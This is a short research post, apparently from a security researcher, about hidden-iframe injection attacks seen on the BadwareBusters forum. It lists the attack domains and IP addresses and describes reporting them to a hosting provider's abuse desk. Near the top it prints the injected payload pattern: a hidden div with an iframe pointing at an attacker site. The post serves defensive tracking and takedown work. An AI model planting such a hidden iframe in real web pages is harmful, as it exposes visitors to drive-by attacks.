I’m researching some new attacks that have been popping up on the BadwareBusters forum recently.
Attacks have the form:
<div style="display:none">mhukhzwbanqawsrlyqptqnfmpiiigkr<iframe width=548 height=403 src="http:ATTACK.SITE:8080/index.php"></iframe></div>
After reviewing the posts by our users I compiled the following list of attack sites:
* bio-vozrast.ru
* your-bio.ru
* biovoz.ru
* age-info.ru
* bio-z.ru
* theprevious.ru
* age-ega.ru
all domains point to a pool of 5 NL based IP addresses:
| AS | IP | CIDR | AS Name |
| 16265 | 85.17.138.27 | 85.17.0.0/16 | LEASEWEB |
| 16265 | 85.17.237.5 | 85.17.0.0/16 | LEASEWEB |
| 15703 | 87.233.139.100 | 87.233.128.0/18 | TRUESERVER |
| 15435 | 217.23.4.76 | 217.23.0.0/20 | KABELFOON |
| 15435 | 217.23.5.27 | 217.23.0.0/20 | KABELFOON |
A cursory portscan shows a wide range of services open for each IP address. 85.17.138.27 has two ports which claim to be webmin interfaces for karaokeplus.info. It is unclear if karaokeplus.info is related to these attack sites.
Of the three AS blocks listed (each corresponding to some sort of internet service) only one has an easy to find abuse address:
abuse@leaseweb.com
I’ve sent an email to Leaseweb and will continue to hunt for contacts at the other two organizations.
